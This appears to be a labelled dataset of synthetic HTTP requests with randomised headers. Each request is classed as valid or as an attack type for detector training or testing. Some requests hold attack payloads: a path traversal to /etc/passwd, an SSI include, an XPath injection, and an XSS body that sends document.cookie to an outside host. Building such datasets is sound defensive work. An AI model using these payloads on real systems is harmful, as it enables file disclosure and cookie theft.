GET /Sweitramoetl18enia/r-j5_oY9XA/60ajSUsIY8a.mdb?vr2itF8anojfW9=n.Es.nUTv&cltcjMrnao=l9So&iMf5replaceB8GHQR=f+aI&6HebjdzhdD1=+a&cmy7ooa0agr=rdocumentcsrserna%7E&yheudntn=-iea&tXnylttn0d0=dlx&ihdc9iin=qthaa&nsdrrfN=oT5murw%3Baccept4vop+&kefa=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html HTTP/1.1
Host: www.hhonmhh.cz
Connection: keep-alive
Accept: audio/x-wav
Accept-Charset: iso-8859-2, koi8-r
Accept-Encoding: *;q=0.2
Accept-Language: ueihtf-eylx;q=0.1, ySt-hftomo6i;q=0.6, kite-tahu;q=0.0
Cache-Control: max-stale
Client-ip: 79.110.171.13
Cookie: oriTku=ec sxt hnrkf;TR1sD=d5n5Wlbw;YCOwDv=rqlib;ey8a=5399609
Cookie2: $Version="20"
Date: Sun, 25 Jan 09 02:44:25 UTC
ETag: "-GzYbTKa0ciTQ3FJ"
Expect: 100-continue
From: twei@aedq.de
If-Modified-Since: Fri, 25 Jun 04 14:03:38 CET
If-Unmodified-Since: Thu, 04 Mar 04 10:27:58 GMT
If-Match: "Qwfa1QdWXZiU4g4U@M"
If-None-Match: *
If-Range: "k9wIW5Jgkxl@8@S@"
Max-Forwards: 2218
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Digest uri=/hecitr/doeame/jelauc/aesajiHl/e5sikade.cfm
Authorization: NTLM NG9wdHUyYUVvcXRlbjJnc2Flc2FkbmVvYTl0aWFlMWNhbmxCcnk=
Range: 595-7160,98-,4-961
Referer: http://sitem.com/kuhabre/kuswrea/nttl/ihhuasnq.cgi
TE: trailers
Trailer: Warning
User-Agent: zsctomttft/6.5
UA-CPU: Sparc
UA-Disp: 0145,4311,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 434x579
Via: 4.7 210.135.138.74, 9.3 212.199.163.249, FTP/7.4 32.243.43.221
Transfer-Encoding: ii3ssr
Upgrade: Dnh/3.3, iienNa/1.0, khpjt/2.7, ote6v4/0.0
Warning: 494 178.239.117.244 "Abhgtrgfsota" "Tue, 21 Mar 06 06:42:46 CET"
X-Forwarded-For: 189.150.137.247
X-Serial-Number: 4859376671430624
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46316
Start - Id: 16558
class: Valid
GET /r@kMuLq1mcNBzP/guinluso7iagOE/it7jJnOAQQZ6Cjv5l3.dll? HTTP/1.0
Host: www.dTt9dmotu.cz:80
Connection: iY7aoiT
Accept: */*
Accept-Charset: windows-1253;q=0.9, iso-8859-9;q=0.6, iso-8859-9;q=0.8
Accept-Encoding: 
Accept-Language: Enhce5tn-aolngneN, e-dSeo;q=0.1, enfunr-eeEeot
Cache-Control: no-cache
Client-ip: 110.75.170.196
Cookie: eje1sebutacE=8
Cookie2: $Version="756"
Date: Sun, 04 Jan 09 13:59:30 GMT
ETag: "N9OzobOJ5WrCIQW2"
Expect: anso=emn1tqz
From: o7mnatoB@rrengt.ch
If-Modified-Since: Wed, 17 Jun 09 05:18:05 CET
If-Unmodified-Since: Thu, 18 Nov 04 08:36:01 CET
If-Match: *
If-None-Match: *
If-Range: "RaQU8G0M-4V5bcA9J"
Max-Forwards: 08
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: NTLM YWllc2F0MWFzbGUzaFJuZWN1d3FmYW1SdE9lUGNkUGVlZ29vb2lnYXd0OG5lYw==
Authorization: Basic dE9lNDptNG4yeA==
Range: -098113
Referer: http://www.wnhtldat.org/zheih/dEso/i6oig/egot.jpeg
TE: deflate;q=0.6
Trailer: If-Range
User-Agent: rqhrei/9.3.6.1.8
UA-CPU: x86
UA-Disp: 2808,9760,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 9430x4545
Via: HTTP/4.0 www.Dlvh.jpeg:09, HTTP/5.5 61.167.52.176
Transfer-Encoding: identity
Upgrade: ere0/9.6
Warning: 516 www.depn.jpeg "etvr6cs" "Wed, 28 Mar 07 21:45:30 GMT"
X-Forwarded-For: 184.226.48.9
X-Serial-Number: 4070028617537255
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16558
Start - Id: 40815
class: SSI
GET /hhsa.mdb?s0d3Qwget8cq=connecth-&YJcatXpscJA6Oe=rhfB8F19&AilaI=9&afeknxOothoos=1401&eNmkwNrtetc=%3C%21--+%23odbc++connect%3D%22niscae%2Caj%2Ctcp%22++++++++statement%3D%22select+++*++++from+++eCsx%22--%3E HTTP/1.1
Host: www.caHusst.org
Connection: uvve
Accept: video/quicktime, image/*;q=0.8, audio/*
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: i-eoi, gr-m;q=0.3, eac-Lt5foet, dgs-1xa3e, I-rtjir
Cache-Control: min-fresh=68
Client-ip: 89.161.138.91
Cookie: bxsE0qowo4q=lbdmheooaoe;novn=596;9uphrtcngtaaka=oLajeeowereplaceb0
Cookie2: $Version="9"
Date: Tue, 26 Feb 08 04:23:31 CET
ETag: "V0yqNhaPfiAfr9wMm2IH"
Expect: zy1Nra
From: kpa1hln@eotgi.biz
If-Modified-Since: Tue, 10 Feb 04 18:25:50 CET
If-Unmodified-Since: Sun, 25 Feb 07 24:47:14 CET
If-Match: "aF0Qd1IJYEhRw4eG"
If-None-Match: *
If-Range: "Jz@uU_i@G5wY0Wp"
Max-Forwards: 82
MIME-Version: 3.0
Pragma: son='empe1i'
Proxy-Authorization: on4ahi jgjs0nph=any1zdr
Authorization: Digest nonce
Range: 8-,53016-,755940-70410
Referer: http://cerhTAnl.be/lntpd7/wrroegds/OfEr/etaqsrt.pl
TE: gzip,trailers,chunked;q=0.6
Trailer: Range
User-Agent: Mozilla/5.4 (Windows; U; Win 9x 8.9; aK-az; rv:9.4.5) Gecko/69896302
UA-CPU: StrongARM
UA-Disp: 327,318,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 871x928
Via: 7.5 www.iaev.tiff, FTP/4.0 www.epOps.shtml, 2.6 17.167.40.108
Transfer-Encoding: eneaao; tdqip=erSa
Upgrade: osd5g/7.7, cplms/1.4, dtwnv0/2.5, h9zg/0.0
Warning: 540 www.po8V.png "hmamwrzrbsooT4ssuu1y" "Sun, 05 Dec 04 12:09:33 CET"
X-Serial-Number: 17196143235816087076
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40815
Start - Id: 8360
class: Valid
GET /6vL/plysmotp8eO6/th/n6GemO4Csj/gqptldtkrt/t_t@8@muZUC5inEZf/ei8h4eis/2hH5JPyY.4dZfp4okUP.pl?childjmP=fTp7X84NR5 HTTP/1.1
Host: www.3odGera.gov
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: o2l3rh=ftcehswi
Client-ip: 129.213.193.127
Cookie: t4hfymtege=y R;lci5zbinWhKN= 29;pQorUlQAiLD= uk2ihntc
Cookie2: $Version="4"
Date: Thu, 28 Aug 08 23:25:28 CET
ETag: W/"qjBR@eXkBl4jAnqZz"
Expect: 100-continue
From: chtn@qt6hosna.org
If-Modified-Since: Fri, 16 Oct 09 16:17:04 UTC
If-Unmodified-Since: Sat, 26 Aug 06 17:26:32 CET
If-Match: "i8.FnvFx04fA9uUNoe"
If-None-Match: *
If-Range: Mon, 26 Apr 10 21:34:24 CET
Max-Forwards: 68
MIME-Version: 6.6
Pragma: ssserrS='mcx'
Proxy-Authorization: NTLM QXU3eGVlYXRkcW9hZDZpTnR5dHRlRWVkYU1CZXd1bkVldXJlT2lpYWU=
Authorization: Basic QVFzdzN1b3k6ZW9oYg==
Range: -3949,19472-179474,-83888
Referer: /waan/al9Ao/rszr7/79osa28/Iafrrd.pdf
TE: trailers,trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/0.9 (Machintosh; U; PPC Mac OS X 1.6; eu-8m; rv:2.2.5) Gecko/71524159
UA-CPU: 68000
UA-Disp: 283,560,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 569x015
Via: HTTP/4.1 14.185.99.90:693, 6.4 www.eqnie.css:89
Transfer-Encoding: identity
Upgrade: YiTM/8.9, cwneoe/0.3, wmA/1.1
Warning: 146 134.48.120.16:1818 "aipevpmprtDsvoAt" 
X-Forwarded-For: 217.157.80.139
X-Serial-Number: 482816
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8360
Start - Id: 15163
class: Valid
GET /3ebQh3mfFCDSUDt/X7P3qY/eseluduvnemlefb0cz/wABY/efR4grSNkri.html?vwstmennHrnio=aneval6zNIot6%7Cviservicesi%2FDechogm&ud=oe3insertidinputJ%40rmt&tSDtljnlipnc=652&cdH=02&FSyautoexecJYO=9liken%3Cs%3AeEd0tf%25t%40fc&kdnlt=4722025&lEdns=sm&kwgetmS-Nusr7Jm-=hJoe&oP=spcf%7CorhAts%28ep%28window.openay&32dKP=92404701&iufeooedstvkn=12 HTTP/1.0
Host: www.bsrmsUwqga.com
Connection: close
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: identity;q=0.4, gzip;q=0.1
Accept-Language: eb-swmr5rm;q=0.5, rp-c, xl-Dkotietu
Cache-Control: only-if-cached
Client-ip: 234.176.105.96
Cookie: nasIlOauo4=>An9fdog$httpsrt;ahxlwtkeess=6196;kohglq=97;eEoedcfpte3sno=e9F8qe.ED
Cookie2: $Version="001"
Date: Fri, 19 Feb 10 13:43:46 CET
ETag: W/"Ib_MaPpW1SvqAe8MR"
Expect: thc8
From: 7stnsn@lhythtbTtd.it
If-Modified-Since: Sun, 18 Dec 05 09:46:06 GMT
If-Unmodified-Since: Sun, 07 May 06 21:01:33 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 06
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: TeEieo oaOscrm=nnas
Authorization: NTLM YWJvd2EzYWRlbnZnMHFlZWMwTkJmc0VpdWFpb294ZVFydW9udGw2YXMweW90Zw==
Range: -96,366774-,-767
Referer: /ke9u.swf
TE: deflate
Trailer: User-Agent
User-Agent: dn0iNWjX http://www.uAlae.cz
UA-CPU: Sparc
UA-Disp: 1668,172,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 1372x650
Via: HTTP/3.1 33.173.217.181:4, HTTP/6.6 216.232.204.198, 2.2 www.ooto5Ed.jpeg
Transfer-Encoding: identity
Upgrade: ldfesa/0.1, 8ts/9.9, nxed/8.9, 9neo/0.1
Warning: 698 www.zyoeu.shtml:9 "0btElpecpr4r" "Thu, 05 Feb 09 02:57:47 CET"
X-Forwarded-For: 155.89.71.222
X-Serial-Number: 54307917779872
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15163
Start - Id: 13835
class: Valid
GET /ls/tFQ1_z/careeeogeHek5fbd/aloenonba2ee/bFBO9ff1Ve3/iz8NR.aspx? HTTP/1.1
Host: www.azaeqhqd.cz
Connection: close
Accept: text/*;q=0.7, application/*, text/*
Accept-Charset: windows-1258;q=0.4, utf-7;q=0.6, windows-1250, iso-8859-5, shift_jis;q=0.3
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale=74950
Client-ip: 145.167.33.139
Cookie: axuoacb=1jaepv6lIo;ebuhaet=tgcrris3mfla;kAxzLttyhtt=inputY;7ef7rECss=eoeN;tlttzegrhH=1551
Cookie2: $Version="857"
Date: Tue, 20 Feb 07 10:06:10 GMT
ETag: "exJ04GpYog6.x7AEvVSu"
Expect: sot5sep
From: 7iia@rhedat0s.it
If-Modified-Since: Thu, 06 Sep 07 13:44:47 CET
If-Unmodified-Since: Sat, 23 Jan 10 19:28:00 UTC
If-Match: *
If-None-Match: "1z0aMRunA18aNSKKTL3t"
If-Range: Thu, 05 Feb 04 17:12:30 GMT
Max-Forwards: 38
MIME-Version: 3.0
Pragma: tmT=umszodl
Proxy-Authorization: Digest qop=auth
Authorization: Basic cnJjNDpyc3d0a3Jh
Range: 691739-,100150-
Referer: /lhle7/bgdrita/iterOTo.mp3
TE: trailers,trailers,trailers
Trailer: Authorization
User-Agent: Mozilla/7.2 (Machintosh; U; PPC 1.1; fn-zS; rv:2.5.0) Gecko/65052257
UA-CPU: MIPS
UA-Disp: 3251,0057,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 750x449
Via: 6.2 www.abjdri.png, HTTP/9.4 221.211.124.243
Transfer-Encoding: identity
Upgrade: eqp/4.6, eiffm/7.0
Warning: 272 www.ss2emoow.tiff "poeyaiei1gtltn" 
X-Forwarded-For: 166.8.232.165
X-Serial-Number: 287710994876
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13835
Start - Id: 44635
class: PathTransversal
GET /iJsn0h_gssfq1iL1xX/hsdd/bwenltlefee/EHRLstdindroppassthruE/ji7Hb3Bi_e/t20_K@AZXXJhaPyT0A1.html? HTTP/1.0
Host: www.gmstvtlra.biz:80
Connection: close
Accept: audio/*;q=0.4, video/*
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: ../../../usr/dsqqdsqsd.xml
Cache-Control: no-cache
Client-ip: 95.91.76.121
Cookie: sW8k7=r&Rttform~keemeusror8cgE;9istiddu=nHxJs8;1tt=eztcaboreasAdz6r;t3oqo8s=4873;tpk=613
Cookie2: $Version="462"
Date: Tue, 16 Mar 10 16:16:42 GMT
ETag: "KyTAOH7Tflr-8NBv"
Expect: yeee
From: fsdIshc@oassmaqEaj.fr
If-Modified-Since: Wed, 11 Jul 07 12:35:06 UTC
If-Unmodified-Since: Fri, 14 Nov 08 01:23:31 UTC
If-Match: "pWhLhTRvMES.Yk4fQP"
If-None-Match: *
If-Range: Sun, 18 Sep 05 01:43:08 GMT
Max-Forwards: 4
Pragma: no-cache
Proxy-Authorization: Basic ZXVibmw6dGVybnI=
Range: 14-43
Referer: http://www.n0eia3ll.gov/n3q1g/2aise5.png
TE: trailers,chunked;q=0.6,trailers
Trailer: Trailer
User-Agent: mWqoUG7 http://www.EdeC.be
UA-OS: FreeBSD
Via: 8.3 www.osriegi.png:14
Upgrade: asau/3.9, tuhqe/5.7, wioc10/0.3
X-Serial-Number: 616147525
----: ---------------------------

null

End - Id: 44635
Start - Id: 8916
class: Valid
GET /vv8uereomri/bcdnqmqt2iDhjto/bWaSqdau0/hntit/1ecdeea/cE5q96EUccV3ZpKD/eIAti77/wcZzRhEs__Qb@_TpXzhZ/eclngjae6woo/ae/Rzl4Rqgroup byDIBhA5v/etptnedecTh.dll?setrereAdytIrze=6201448&3umdenseaFbdz=c&mnA=stylep%27tawgehttpunzan&aln3=t&e6iam8ia=3633682&KLmtbK-SDpm=monna%7Ettho%24&..oVY=eq53 HTTP/1.0
Host: www.tscsuuecf.org:80
Connection: close
Accept: */*;q=0.3
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: s1Jebl-letoo5j
Cache-Control: Tpo=Mfc
Client-ip: 94.217.250.252
Cookie: nhblicgxeln7rs=>allgtnwp-aawytti%connecto;hiPhidrsrvoTdIz=0;h8Aasabet=0eelo;Ol7gr5Krr0ey=fmdrtxs;zDKC=qregDI
Cookie2: $Version="266"
Date: Sun, 29 Oct 06 14:53:12 GMT
ETag: "o_YERB0dpVOt2YXC"
Expect: d9ctOe=heth;tUanr5o=xgazT
From: gyture4e@b1eUnPsa.de
If-Modified-Since: Fri, 16 Jul 04 16:51:12 CET
If-Unmodified-Since: Sun, 23 Nov 08 11:55:26 UTC
If-Match: *
If-None-Match: "J41NEoiNYYC_GZ7b"
If-Range: "Ld@KrUh8fHlXTDG_sI"
Max-Forwards: 2716
MIME-Version: 7.9
Pragma: oi=7e17S
Proxy-Authorization: Digest algorithm=MD5
Authorization: NTLM eWNlbnV0cmllb2phbGVudWE5aTJlZWxvc3JtNmk2ZW8=
Range: 7-3572
Referer: /voimp.mpeg
TE: gzip,trailers,trailers
Trailer: Cache-Control
User-Agent: Mozilla/6.4 (Windows; U; Win98 7.5; mg-il; rv:3.9.4) Gecko/89659351
UA-CPU: 68000
UA-Disp: 7865,493,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 3660x726
Via: 6.3 65.101.129.100, 8.6 83.255.140.74
Transfer-Encoding: deflate
Upgrade: D54Tc/5.2
Warning: 052 65.130.149.140 "iFomeu7jcadiest" 
X-Forwarded-For: 219.111.245.62
X-Serial-Number: 266699
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8916
Start - Id: 11618
class: Valid
GET /rrm-0Jl6H591quCdzJYC/dapateeathw2e2neebrN/awh/iQpjMc9dBNBKY0gJka/kzDZDirw-@g.x/nuhtyWDlh8nrxeiremts/4tslcpi/oPkNnullexecosv0/aaugeer/rjSaw2V17DG3/KscriptydA/4sse.html?5l2=yjuaP&FleoScndTbctg=376330&CAIAiMU=sk7v&60DNOYLP-Dupdatex=t%28sock_stream2seglibsystemboot.inini&acrnk=urehnashco&esfe2b=ldr&7oonl=478&dcwNV0dsam@gVF=hnlsm%3C7rtr73ls&inlimTenwT=n_u2.XPmsCbm&rIo3=re&tssgemh6=qfg1AA30&8eO=5142562&feySsseoqe5=mc4kaPiuyoj&x599=null%5Dee%2F&nyri5Crwbs=65897 HTTP/1.1
Host: 68.233.87.222
Connection: close
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 95.90.20.151
Cookie: cceAbrkrcnbinoh=\shutdowns4sNktoahtacces;toTmSo=2t;Nre5ilh=pnpasswd2;Tselectwinnt1=bj\;ecoe4tpleymhmnN=7
Cookie2: $Version="139"
Date: Sat, 13 Jan 07 09:13:33 CET
ETag: "llU6qD8j24rpFJNi"
Expect: 100-continue
From: e6nwjaw0@sbrmwli.gov
If-Modified-Since: Wed, 17 Mar 10 16:53:08 CET
If-Unmodified-Since: Thu, 08 Jul 04 18:54:06 GMT
If-Match: "EwRZLB2UqLFiE4Zu"
If-None-Match: *
If-Range: *
Max-Forwards: 0470
MIME-Version: 0.8
Pragma: lobr2b='e'
Proxy-Authorization: NTLM YWViczBoc2F5cFVvaWxidGl1ZWVpYW9yYW5la2lpZW9ra2FscGk=
Authorization: NTLM Y2V5b2dyZXNPTnY3dTBlZHBhaGhvbmhuMnJzaGVub3RjYW1CbnJydDRr
Range: 4-343448,-16531
Referer: http://www.as4Lnus.biz/iese/iheaoo/Di4rGab0.rar
TE: trailers,trailers,trailers
Trailer: Trailer
User-Agent: drahenawta
UA-CPU: StrongARM
UA-Disp: 3478,401,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 3585x2586
Via: ouwze/1.8 www.joouj.js
Transfer-Encoding: oOeCgd
Upgrade: Hsoeo/0.1, t4K/8.3, iwhfu/8.2
Warning: 857 www.weac.gif "Cdlyhd" 
X-Forwarded-For: 44.159.255.205
X-Serial-Number: 046539438868930
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11618
Start - Id: 14051
class: Valid
GET /aEhnc6mhOts/lJhnSaoAd4l/0ooRpssetrawreah/orTn/tdeeGypH/m.CvNTnullLuX/w93QLJa.jpeg? HTTP/1.0
Host: www.ensAsieue.ch
Connection: iiclr
Accept: */*;q=0.9
Accept-Charset: iso-8859-8, iso-8859-2, windows-1254
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: max-age=894
Client-ip: 234.224.59.200
Cookie: 1YL8tmpB5=4173708263;jioeony7cipe=70;LbetweeneF@4Ueb=1
Cookie2: $Version="0"
Date: Thu, 18 Nov 04 04:24:15 UTC
ETag: "PySUbOrNwG0oSxVET_11"
Expect: 100-continue
From: pyeIhti@vhei.be
If-Modified-Since: Wed, 20 Jul 05 09:35:44 UTC
If-Unmodified-Since: Mon, 14 Jul 08 01:06:13 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 22 Aug 08 06:15:40 UTC
Max-Forwards: 9895
MIME-Version: 2.0
Pragma: jardukis=0
Proxy-Authorization: NTLM OG9zZXlhOHNlZWxlaXRDNGpydGFFb05sNUUxdHI0YWRUczhuOHVJbGh5
Authorization: NTLM dG1zem9sbWl0dGFhdGVlb291Y2VsbGV1OGQ0cm9ubGVpWEMzMw==
Range: 477582-,-394214
Referer: http://www.n1yh.st/EeimeNLi/ntmr5gse/shtlu/jeiSofty.png
TE: trailers,trailers,trailers
Trailer: If-Match
User-Agent: Mozilla/8.2 (compatible; Konqueror/6.6; Solaris; eotnoAj; 8nnal1hs; IkshgAc)
UA-CPU: StrongARM
UA-Disp: 091,777,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 9552x9727
Via: 0.4 38.206.45.139, 7.3 210.174.65.80
Transfer-Encoding: nW8enh; hwnesn=rygPdAhh
Upgrade: iQr/6.2
Warning: 826 60.35.56.208 "d0eihicmspnehASyl" "Tue, 15 Dec 09 11:56:23 GMT"
X-Forwarded-For: 241.125.208.47
X-Serial-Number: 0043438224132828242
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14051
Start - Id: 46905
class: XSS
PUT /fOd_8KCBdnkopGgHtBx/hltiis8tofsKKIjots/_vADn-6YHQ/tO6w/Rc8c6mtmnsgf3Ee8.jsp? HTTP/1.0
Content-Length: 301
Content-Language: eismsEr,eeicem,dqopHp
Content-Encoding: gzip
Content-Location: /r9T5s/bfem2/thtnirei/aoot.png
Content-MD5: bjB0aXdpZHlzMWhiNnVBbA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 14 Sep 04 09:40:36 GMT
Last-Modified: Sat, 17 Jan 09 07:59:21 CET
Host: 206.40.85.11:0
Connection: ehwseee
Accept: */*;q=0.8
Accept-Charset: utf-7, iso-8859-9
Accept-Encoding: gzip, identity;q=0.5
Accept-Language: acRuadro-ce0wrcb, u8N-ekM
Cache-Control: min-fresh=2
Client-ip: 44.189.197.231
Cookie: glumbe=3764;ivateeJ=ros8iawe mh1s;nd=nartnautoexecsaaautoexeccsf;pounoe2h=cbc@eallhrysexec1t[ 
Cookie2: $Version="07"
Date: Fri, 17 Jun 05 22:13:32 UTC
ETag: "t@UnAXUQXOo_-9kX"
Expect: rezd8=ae1nY;5le1igo=1iciVsnl
From: nbfea3@yM2KA0.biz
If-Modified-Since: Sun, 29 Aug 04 18:31:05 CET
If-Unmodified-Since: Wed, 23 May 07 21:17:04 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 16 Oct 04 04:44:41 CET
Max-Forwards: 9
MIME-Version: 9.1
Pragma: autu=r
Proxy-Authorization: NTLM Y2NlbUFhZmIzc3JobmUwMm14bGVyZWlpbWk4eGVUZzJocmVodGluRWl4aXRuaVo=
Authorization: Digest opaque="ntdla"
Range: -790
Referer: /klfna/aigbx.php3
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/9.9 (X11; U; Unix 0.6; uo-Ov; rv:9.2.6) Gecko/78988243
UA-CPU: MIPS
UA-Disp: 802,874,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 8473x700
Via: 3.4 www.asiZl.jpeg:817, 4.3 www.96Se0b.jpg
Transfer-Encoding: compress
Upgrade: sdW/7.9, agrd/5.9, wt6wa9/7.2
Warning: 749 124.119.94.150:741 "rcapb76l7ke" "Tue, 13 Dec 05 01:19:14 GMT"
X-Forwarded-For: 59.28.178.137
X-Serial-Number: 93268691782079750245
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~

ikrees0=sHe&netti=<div   style   =    "   background-image: url(javascript:    [document.location.replace  ('http://www.icli.com/cgi-bin/annsie.cgi'+document.cookie);]);   ">&tsrLJpTsq=uf o[&r6exrOsomh=lbhlike&6sbmnonometc=oifho7et0tdI2co&ae2Cet=Teabzt1

End - Id: 46905
Start - Id: 34171
class: Valid
POST /iKdkWtKGx9ZO/thhnUulnoOMn.tiff? HTTP/1.0
Content-Length: 184
Content-Language: tiue,o
Content-Encoding: gzip
Content-Location: /s9aox/evettEzu/e8OoSnT/nretvav.swf
Content-MD5: ODJvYW1kamZzZTJyN1RpdA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 17 Jan 08 06:21:18 UTC
Last-Modified: Thu, 19 Jun 08 03:30:16 CET
Host: www.thwydrir0t.org
Connection: close
Accept: */*
Accept-Charset: windows-1254, iso-8859-9, utf-8, x-mac-cyrillic
Accept-Encoding: 
Accept-Language: feno-ptl
Cache-Control: no-store
Client-ip: 201.97.116.125
Cookie: WdTVQ26=Ywgetesyis4deeCscriptt2cdocument;bhieFr=einXbXm)8de;xbetweenwmP_=74
Cookie2: $Version="60"
Date: Thu, 26 Aug 04 11:44:51 GMT
ETag: W/"tT2@WS4gO2tZdMlcbNYe"
Expect: 100-continue
From: ol8k@oiren.st
If-Modified-Since: Fri, 30 May 08 02:59:34 CET
If-Unmodified-Since: Sun, 11 Mar 07 02:39:45 CET
If-Match: *
If-None-Match: "vT9a8k8vkoRxc0zm"
If-Range: Tue, 14 Jul 09 05:36:56 GMT
Max-Forwards: 9
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Digest username="pcny3"
Authorization: Digest realm
Range: 480-037,1318-,97894-1
Referer: http://pre5bn.fr/iEYe.wmn
TE: trailers
Trailer: Authorization
User-Agent: igsicomt5E (ejs8ragr; hlTxyrxZ)
UA-CPU: x86
UA-Disp: 892,7658,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 995x590
Via: 2.0 www.vrsewrm.shtml, 5.3 www.gria.js
Transfer-Encoding: deflate
Upgrade: ciwqt/3.9, Ltten/0.9
Warning: 026 www.euaepe.tiff "E1ssmoL4mnehtgAslnrW" 
X-Forwarded-For: 234.13.70.211
X-Serial-Number: 8391965
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

8egepjt=abKera&s0leeei1nwd2dh3=P4omattofcdrticsf9&4avtlg=bds5rahnenHnaIe8t&7fyex7ojdsW2ge=953773547&uisgooncfi=execet&bgsound6havingFg=iz]hnoEEd&X4JL0vK7B9=1&eosdpnoATo=ee&K50MA=io8g

End - Id: 34171
Start - Id: 49228
class: XPathInjection
GET /mSPeqlgSM5Wyi/Khxt/iutc1fa/t8J0iEIbEI5WK@/Jw2E87D7l5eY/ehK7FGaONgDA3TU5izb/RCNzg3YV_8/dwAir2/gsJ/us0a1G5sotpirq/6wvUtTAxtZL/wjNoin.aspx?deeine2in8=iWtww8PpS&rA6c0osoi9kfr=ss2ebg%2Fsu0jv%2Fo0hl%2Fchild%3A%3Anode%28%29%5B++position%28%29%3D66%5D++%7C+++Ipec%2Fsbur1e%2Ffgori%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D9%5D+++++or++++%27eyhe6eor%27%3D+++%27&0Senn=mo&cpukn=ieyhMnl&1KorZdeleteSTm=55862 HTTP/1.1
Host: www.rmohur8i.it:80
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.9
Cache-Control: ie8=el8Prts
Client-ip: 166.148.58.138
Cookie: oonEjnU=hhtpasseoeezwre;jNdexdotUzr=267656461
Cookie2: $Version="911"
Date: Fri, 17 Mar 06 06:07:03 UTC
ETag: "E5Pz1BLK-9C3@Q7bcLV"
Expect: hondotn=eiuen;itoohana=o9un
From: nBas@OeentuDe.cz
If-Modified-Since: Sun, 03 Dec 06 20:11:24 GMT
If-Unmodified-Since: Wed, 05 May 04 02:34:57 CET
If-Match: "IiwbT6McNTNS2gLTg"
If-None-Match: *
If-Range: *
Max-Forwards: 664
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: NTLM b0NpaWVoZW1nbmU3aGVzcW5yaEZ0TG5pZW9lbnNlZ3Rub3JzZGhyQW5laDNsbg==
Authorization: Digest realm
Range: -628
Referer: /HF32ofI/sipi.asp
TE: deflate
Trailer: Date
User-Agent: Mozilla/6.1 (X11; U; SunOS sun4u 2.9; ro-hs; rv:2.7.0) Gecko/95991284
UA-CPU: Sparc
UA-Disp: 2948,912,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 353x220
Via: 6.1 195.149.154.208
Transfer-Encoding: identity
Upgrade: irn75/4.5, Aednh/6.2, trFh/5.3, nrkms/0.6
Warning: 713 83.69.138.234 "fdz3svieintgegHkWrn" "Sat, 24 Jun 06 11:23:08 CET"
X-Forwarded-For: 159.181.91.193
X-Serial-Number: 312383203635
----: ---------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 49228
Start - Id: 36293
class: PathTransversal
